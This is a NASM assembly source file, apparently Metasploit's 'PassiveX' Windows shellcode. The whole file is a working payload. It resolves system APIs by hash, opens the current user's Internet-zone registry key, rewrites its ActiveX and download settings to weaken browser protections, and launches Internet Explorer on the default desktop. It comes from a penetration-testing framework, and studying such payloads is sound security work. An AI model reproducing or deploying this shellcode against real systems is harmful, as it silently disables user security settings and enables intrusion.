metasploit-framework/external/source/shellcode/windows/msf2/passivex.asm

177 lines
3.1 KiB
NASM
Raw Normal View History

BITS 32
GLOBAL _start
_start:
cld
call get_find_function
strings:
db "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0
reg_values:
db "1004120012011001"
url:
db "C:\progra~1\intern~1\iexplore -new", 0x0
get_find_function:
call startup
find_function:
pushad
mov ebp, [esp + 0x24]
mov eax, [ebp + 0x3c]
mov edi, [ebp + eax + 0x78]
add edi, ebp
mov ecx, [edi + 0x18]
mov ebx, [edi + 0x20]
add ebx, ebp
find_function_loop:
jecxz find_function_finished
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
compute_hash:
xor eax, eax
cdq
compute_hash_again:
lodsb
test al, al
jz compute_hash_finished
ror edx, 0xd
add edx, eax
jmp compute_hash_again
compute_hash_finished:
find_function_compare:
cmp edx, [esp + 0x28]
jnz find_function_loop
mov ebx, [edi + 0x24]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edi + 0x1c]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
mov [esp + 0x1c], eax
find_function_finished:
popad
retn 8
startup:
pop edi
pop ebx
find_kernel32:
xor edx, edx
mov eax, [fs:edx+0x30]
test eax, eax
js find_kernel32_9x
find_kernel32_nt:
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov eax, [eax + 0x8]
jmp short find_kernel32_finished
find_kernel32_9x:
mov eax, [eax + 0x34]
add eax, byte 0x7c
mov eax, [eax + 0x3c]
find_kernel32_finished:
mov ebp, esp
find_kernel32_symbols:
push 0x73e2d87e ; ExitProcess
push eax
push 0x16b3fe72 ; CreateProcessA
push eax
push 0xec0e4e8e ; LoadLibraryA
push eax
call edi
xchg eax, esi
call edi
mov [ebp], eax
call edi
mov [ebp + 0x4], eax
load_advapi32:
push edx
push 0x32336970
push 0x61766461
push esp
call esi
resolve_advapi32_symbols:
push 0x02922ba9
push eax
push 0x2d1c9add
push eax
call edi
mov [ebp + 0x8], eax
call edi
xchg eax, edi
xchg esi, ebx
open_key:
push esp
push esi
push 0x80000001
call edi
pop ebx
add esi, byte (reg_values - strings)
push eax
mov edi, esp
set_values:
cmp byte [esi], 'C'
jz initialize_structs
push eax
lodsd
push eax
mov eax, esp
push byte 0x4
push edi
push byte 0x4
push byte 0x0
push eax
push ebx
call [ebp + 0x8]
jmp set_values
; This is NT specific, but it lets us execute iexplore regardless
; of what drive it's installed on so long as it's on the same drive
; as the WINDOWS directory, which it should always be.
fixup_drive_letter:
mov cl, byte [0x7ffe0030]
mov byte [esi], cl
initialize_structs:
push byte 0x54
pop ecx
sub esp, ecx
mov edi, esp
push edi
rep stosb
pop edi
mov byte [edi], 0x44
inc byte [edi + 0x2c]
inc byte [edi + 0x2d]
; set lpDesktop to WinSta0\Default so that this works with non-interactive services
push 0x00746c75
push 0x61666544
push 0x5c306174
push 0x536e6957
mov [edi + 8], esp
execute_process:
lea ebx, [edi + 0x44]
push ebx
push edi
push eax
push eax
push byte 0x10
push eax
push eax
push eax
push esi
push eax
call [ebp]
exit_process:
call [ebp + 0x4]